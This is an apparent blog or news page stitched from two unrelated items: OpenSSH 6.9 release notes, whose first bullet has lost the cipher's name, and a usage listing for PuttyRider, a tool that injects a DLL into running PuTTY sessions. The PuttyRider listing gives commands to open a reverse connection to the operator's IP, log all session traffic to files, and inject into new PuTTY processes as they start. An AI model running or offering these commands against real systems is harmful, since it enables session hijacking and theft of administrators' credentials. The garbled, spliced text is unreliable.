OpenSSH 6.9 released; chacha20-poly1305 is the default cipher now

New Features

* ssh(1), sshd(8): promote to be the
default cipher

* sshd(8): support admin-specified arguments to AuthorizedKeysCommand;

* sshd(8): add AuthorizedPrincipalsCommand that allows retrieving
authorized principals information from a subprocess rather than
a file.

* ssh(1), ssh-add(1): support PKCS#11 devices with external PIN
entry devices bz#2240

* sshd(8): allow GSSAPI host credential check to be relaxed for
multihomed hosts via GSSAPIStrictAcceptorCheck option; bz#928

* ssh-keygen(1): support “ssh-keygen -lF hostname” to search
known_hosts and print key hashes rather than full keys.

* ssh-agent(1): add -D flag to leave ssh-agent in foreground without
enabling debug mode; bz#2381

PuttyRider tool hijacks Putty sessions in order to sniff conversation and inject Linux commands.

Puttyrider targets sysadmin tool putty.  This tiny utility hijacks putty sessions and injects code in open sessions.


List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don’t forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Download, code, details here